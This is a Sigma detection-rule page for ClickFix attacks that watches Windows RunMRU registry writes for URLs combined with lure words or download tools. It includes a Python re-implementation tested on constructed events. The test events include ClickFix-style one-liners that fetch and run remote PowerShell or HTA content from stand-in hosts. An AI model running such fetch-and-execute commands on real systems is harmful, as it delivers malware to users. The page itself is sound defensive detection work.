Detection | Level: high | Status: experimental
Potential ClickFix Execution Pattern - Registry
Detects potential ClickFix malware execution patterns by monitoring registry value writes to the Explorer RunMRU key whose data contains an HTTP/HTTPS link. ClickFix is distributed through phishing campaigns and relies on clipboard hijacking and fake CAPTCHA pages: the fake CAPTCHA page instructs the user to open the Run dialog (Win+R) and paste the hijacked clipboard content, typically a one-liner that downloads and executes a remotely hosted malicious file or script. Every command submitted through the Run dialog is recorded as a value under RunMRU, which is why the rule looks there.
Author: Swachchhanda Shrawan Poudel (Nextron Systems)
Created: Tue Mar 25
Updated: Wed Nov 19
Rule ID: f5fe36cf-f1ec-4c23-903d-09a3110f6bbb
Product: windows
Log Source
Product: windows
Category: registry_set
Detection Logic (3 selectors)
```yaml
detection:
    selection_registry:
        TargetObject|contains: '\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\'
    selection_details:
        Details|contains:
            - 'http://'
            - 'https://'
    selection_susp_pattern:
        - Details|contains:
              # Add more suspicious keywords
              - 'account'
              - 'anti-bot'
              - 'botcheck'
              - 'captcha'
              - 'challenge'
              - 'confirmation'
              - 'fraud'
              - 'human'
              - 'identification'
              - 'identificator'
              - 'identity'
              - 'robot'
              - 'validation'
              - 'verification'
              - 'verify'
        - Details|contains:
              - '%comspec%'
              - 'bitsadmin'
              - 'certutil'
              - 'cmd'
              - 'cscript'
              - 'curl'
              - 'finger'
              - 'mshta'
              - 'powershell'
              - 'pwsh'
              - 'regsvr32'
              - 'rundll32'
              - 'schtasks'
              - 'wget'
              - 'wscript'
    condition: all of selection_*
```

The two `Details|contains` lists under `selection_susp_pattern` are alternatives (OR). `all of selection_*` then requires all three selections to hold, so an event must be a write under RunMRU, the written value must contain an HTTP/HTTPS URL, and it must also contain either a CAPTCHA/verification lure word or the name of an interpreter or download utility. Sigma `contains` is a case-insensitive substring test, so `cmd` also matches inside longer tokens such as a URL path.

False Positives
Legitimate applications or users populating RunMRU with HTTP/HTTPS links, for example a URL typed into the Run dialog whose path happens to contain a keyword such as 'account' or 'verify'.
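To see how the three selectors combine, and why the false-positive class above exists, here is an added re-implementation of the rule's matching logic in Python, run over constructed Sysmon Event ID 13 (RegistryEvent: Value Set) records. This is example code written for this page, not the rule's own code and not Sigma's or pySigma's matching engine; the SID, hostnames, and RunMRU value names are made up, and the field names `TargetObject` and `Details` follow Sysmon's registry events.

```python
"""Re-implementation of the rule's matching logic (added example, not the
rule's own code), run over constructed Sysmon Event ID 13 records.

Sigma semantics reproduced here:
  * 'field|contains: x'                 -> case-insensitive substring test
  * a list of values under one field    -> OR
  * a list of maps under a selection    -> OR (selection_susp_pattern)
  * 'condition: all of selection_*'     -> AND of the three selections
"""

# selection_registry: the Explorer RunMRU key, trailing backslash kept as in the rule
RUNMRU_PATH = "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\"

# selection_details: the pasted text must embed a URL
URL_SCHEMES = ("http://", "https://")

# selection_susp_pattern, first alternative: CAPTCHA / verification lure words
LURE_KEYWORDS = (
    "account", "anti-bot", "botcheck", "captcha", "challenge", "confirmation",
    "fraud", "human", "identification", "identificator", "identity", "robot",
    "validation", "verification", "verify",
)

# selection_susp_pattern, second alternative: interpreters and download LOLBins
EXEC_KEYWORDS = (
    "%comspec%", "bitsadmin", "certutil", "cmd", "cscript", "curl", "finger",
    "mshta", "powershell", "pwsh", "regsvr32", "rundll32", "schtasks", "wget",
    "wscript",
)


def contains_any(value: str, needles) -> bool:
    """Sigma 'contains' over a list: case-insensitive, any needle suffices."""
    haystack = value.lower()
    return any(n.lower() in haystack for n in needles)


def evaluate(event: dict) -> dict:
    """Verdict of each selection plus the final condition for one event."""
    target = event.get("TargetObject", "")
    details = event.get("Details", "")
    verdict = {
        "selection_registry": contains_any(target, (RUNMRU_PATH,)),
        "selection_details": contains_any(details, URL_SCHEMES),
        "selection_susp_pattern": contains_any(details, LURE_KEYWORDS)
        or contains_any(details, EXEC_KEYWORDS),
    }
    # 'all of selection_*': every selection must hold
    verdict["match"] = all(verdict[k] for k in
                           ("selection_registry", "selection_details",
                            "selection_susp_pattern"))
    return verdict


def matches_rule(event: dict) -> bool:
    return evaluate(event)["match"]


# Constructed Sysmon EventID 13 records (hypothetical SID and hosts).  A value
# submitted via Win+R lands under HKU\<SID>\...\Explorer\RunMRU\<letter>, and
# Windows stores it with a trailing "\1" marker.
SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"
RUNMRU = f"HKU\\{SID}\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU"

SAMPLE_EVENTS = {
    # ClickFix-style one-liner pasted from a fake CAPTCHA page: fires
    "clickfix_powershell": {
        "EventID": 13, "TargetObject": RUNMRU + "\\a",
        "Details": 'powershell -w hidden -c "irm https://captcha-check.invalid/verify | iex"\\1',
    },
    # mshta variant in mixed case: 'contains' is case-insensitive, still fires
    "clickfix_mshta_mixed_case": {
        "EventID": 13, "TargetObject": RUNMRU + "\\b",
        "Details": "MSHTA HTTPS://Anti-Bot.invalid/Check.hta\\1",
    },
    # user opened an intranet URL from the Run box: URL present, no keywords
    "benign_url": {
        "EventID": 13, "TargetObject": RUNMRU + "\\c",
        "Details": "https://intranet.example.invalid/timesheet\\1",
    },
    # benign URL whose path happens to carry lure words: the documented FP class
    "benign_url_with_lure_words": {
        "EventID": 13, "TargetObject": RUNMRU + "\\d",
        "Details": "https://support.example.invalid/account/verify-email\\1",
    },
    # same payload written to a Run key instead of RunMRU: not this rule's scope
    "run_key_not_runmru": {
        "EventID": 13,
        "TargetObject": f"HKU\\{SID}\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater",
        "Details": 'powershell -c "irm https://captcha-check.invalid/x | iex"',
    },
    # LOLBin without a URL: fails selection_details
    "cmd_no_url": {
        "EventID": 13, "TargetObject": RUNMRU + "\\e",
        "Details": "cmd /c whoami\\1",
    },
}


def triage(events: dict) -> list:
    """Names of the events the rule would alert on, in input order."""
    return [name for name, ev in events.items() if matches_rule(ev)]


if __name__ == "__main__":
    for name, ev in SAMPLE_EVENTS.items():
        print(f"{name:28s} {evaluate(ev)}")
    print("alerts:", triage(SAMPLE_EVENTS))
```

Running it shows the two ClickFix records and the benign `/account/verify-email` URL all alerting, while the Run-key write and the URL-less `cmd` entry do not. The third alert is the false-positive class the rule documents: the lure-word list is matched as substrings anywhere in the value, so tuning for a given environment usually means tightening the keyword lists or adding a filter for known-good hosts rather than touching the RunMRU or URL selectors.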
MITRE ATT&CK
Tactic: Execution (attack.execution)
Sub-technique: T1204.001 User Execution: Malicious Link (attack.t1204.001)
Rule Metadata
Rule ID
f5fe36cf-f1ec-4c23-903d-09a3110f6bbb
Status
experimental
Level
high
Type
Detection
Created
Tue Mar 25
Modified
Wed Nov 19
Path
rules/windows/registry/registry_set/registry_set_potential_clickfix_execution.yml
Raw Tags
attack.execution, attack.t1204.001